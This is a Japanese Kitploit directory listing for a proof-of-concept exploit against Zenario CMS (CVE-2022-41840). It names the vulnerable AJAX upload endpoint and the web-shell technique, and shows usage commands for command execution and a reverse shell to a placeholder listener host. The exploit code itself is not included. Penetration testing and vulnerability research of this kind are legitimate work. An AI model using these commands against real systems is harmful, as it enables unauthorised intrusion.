Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-41840-PoC — これは、Zenario を実行している環境向けの CVE-2022-41840 の PoC エクスプロイトです。 | Kitploit
ツール/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

これは、Zenario を実行している環境向けの CVE-2022-41840 の PoC エクスプロイトです。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Zenario CMS 9.3 - 未認証RCEエクスプロイト

CVE-2022-41840

Zenario CMS バージョン9.3以前に影響する未認証のリモートコード実行(RCE)脆弱性です。このエクスプロイトは、AJAXエンドポイントのファイルアップロード脆弱性を悪用してPHPウェブシェルをアップロードし、コード実行を達成します。

脆弱性の詳細

  • CVE: CVE-2022-41840
  • 影響を受けるバージョン: Zenario CMS <= 9.3
  • 脆弱性の種類: 未認証のファイルアップロードによるRCE
  • 攻撃ベクトル: /zenario/ajax.php へのHTTP POST
  • 必要な権限: なし(未認証)

使用方法

対話型ウェブシェル

root@kitploit:~
python3 zenario_exploit.py --target http://target.com

単一コマンドの実行

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --cmd "id"

リバースシェル

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

必要条件

  • Python 3.x
  • requests ライブラリ

依存関係をインストール:

root@kitploit:~
pip install requests

機能

  • 脆弱なAJAXエンドポイントを介した自動PHPウェブシェルアップロード
  • 成功率を高めるための複数のinstanceId値のサポート
  • JSONおよび正規表現ベースのパス抽出
  • 複数のリバースシェルペイロードオプション(bash、python、perl、nc)
  • ターミナル対応の完全対話型PTYシェル
  • リバースシェル失敗時のウェブシェルフォールバック

免責事項

教育および許可されたセキュリティテスト目的に限ります。

このツールは、セキュリティ研究者やペネトレーションテスターが、自己所有または明示的なテスト許可を得たシステムをテストするために提供されています。コンピュータシステムへの不正アクセスは違法であり、固く禁止されています。

メンテナは、本ツールの誤用またはそれによって引き起こされた損害について一切の責任を負いません。

ライセンス

このコードは教育目的で提供されています。

ツールをダウンロード